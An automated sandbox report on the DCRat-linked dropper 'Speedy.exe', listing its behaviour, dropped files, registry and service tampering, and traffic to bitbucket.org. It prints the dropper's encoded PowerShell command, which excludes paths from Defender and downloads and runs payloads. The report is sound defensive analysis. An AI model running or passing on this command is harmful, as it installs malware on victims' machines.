Analysis Overview
SHA256
1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096
Threat Level: Known bad
The file Speedy.exe was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Modifies security service
DcRat
DCRat payload
Drops file in Drivers directory
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Power Settings
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-21 19:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-21 19:24
Reported
2024-07-21 19:27
Platform
win7-20240705-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3032 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3032 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3032 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 1892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 1892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 1892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Speedy.exe
"C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbAB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAANAAwADEAOgAgAE4AbwAgAFYAUABTACAAaQBzACAAYQBsAGwAbwB3AGUAZAAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHgAeQAjAD4AOwAiADsAPAAjAG4AdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQBpAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBmAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AawBwAHUAbgB0AGwAdQBjAC4AZQB4AGUAJwAsACAAPAAjAHgAaABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBsAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApACkAPAAjAGUAdgB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AdgBvAGwAdQBuAGUALgBlAHgAZQAnACwAIAA8ACMAcABsAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHYAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGIAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBUAG8AcgAuAGUAeABlACcAKQApADwAIwBkAGwAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB0AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApADwAIwB3AGMAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAHEAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB3AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVABvAHIALgBlAHgAZQAnACkAPAAjAHUAaQBzACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
Files
memory/3032-0-0x000007FEF5B83000-0x000007FEF5B84000-memory.dmp
memory/3032-1-0x0000000001000000-0x000000000102E000-memory.dmp
memory/2364-6-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/2364-7-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2364-8-0x0000000001D80000-0x0000000001D88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c3e23a674037974ce33009b2973f2c23 |
| SHA1 | 24c7a1c0d5b2ea895d56b52129ab4ca6f0e5b21e |
| SHA256 | ec3f82cbe08fbafcb66bb15a64c5c270eb097b8d42dbd7b720509451aa556507 |
| SHA512 | ba1782aa7c2ec142000a7675ff4cf92481c9b6cd5e7a79578d987fde0b7febc7ba36b63e8811fe0031d95d9dc5dde9753b347a5b7436192ac1ba3b802039e296 |
memory/2364-14-0x0000000002C20000-0x0000000002CA0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-21 19:24
Reported
2024-07-21 19:27
Platform
win10v2004-20240709-en
Max time kernel
136s
Max time network
130s
Command Line
Signatures
DcRat
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\ft.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\DriverHostCrtNet\comSvc.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Tor.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\DriverHostCrtNet\comSvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\DriverHostCrtNet\System.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ft.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Tor.exe | N/A |
| N/A | N/A | C:\DriverHostCrtNet\comSvc.exe | N/A |
| N/A | N/A | C:\DriverHostCrtNet\System.exe | N/A |
| N/A | N/A | C:\DriverHostCrtNet\System.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Google\Temp\cc11b995f2a76d | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE5A1.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\ModifiableWindowsApps\conhost.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\e6c9b481da804f | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C1.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\lsass.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\RCXEB05.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\RCXFA73.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\winlogon.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Multimedia Platform\RCX11F.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Multimedia Platform\lsass.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\winlogon.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\RCXEAF4.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updaterload.exe | C:\Users\Admin\AppData\Local\Temp\ft.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.371\27d1bcfc3c54e0 | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\lib\images\cursors\088424020bedd6 | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\RCXFA04.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Multimedia Platform\RCX19D.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\6203df4a6bafc7 | C:\DriverHostCrtNet\comSvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Web\RuntimeBroker.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Windows\Web\9e8d7a4ca61bd9 | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Windows\Web\RCXF019.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Windows\Web\RCXF01A.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Windows\Web\RuntimeBroker.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Tor.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\DriverHostCrtNet\comSvc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\DriverHostCrtNet\System.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Speedy.exe
"C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbAB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAANAAwADEAOgAgAE4AbwAgAFYAUABTACAAaQBzACAAYQBsAGwAbwB3AGUAZAAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHgAeQAjAD4AOwAiADsAPAAjAG4AdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQBpAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBmAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AawBwAHUAbgB0AGwAdQBjAC4AZQB4AGUAJwAsACAAPAAjAHgAaABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBsAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApACkAPAAjAGUAdgB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AdgBvAGwAdQBuAGUALgBlAHgAZQAnACwAIAA8ACMAcABsAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHYAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGIAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBUAG8AcgAuAGUAeABlACcAKQApADwAIwBkAGwAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB0AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApADwAIwB3AGMAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAHEAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB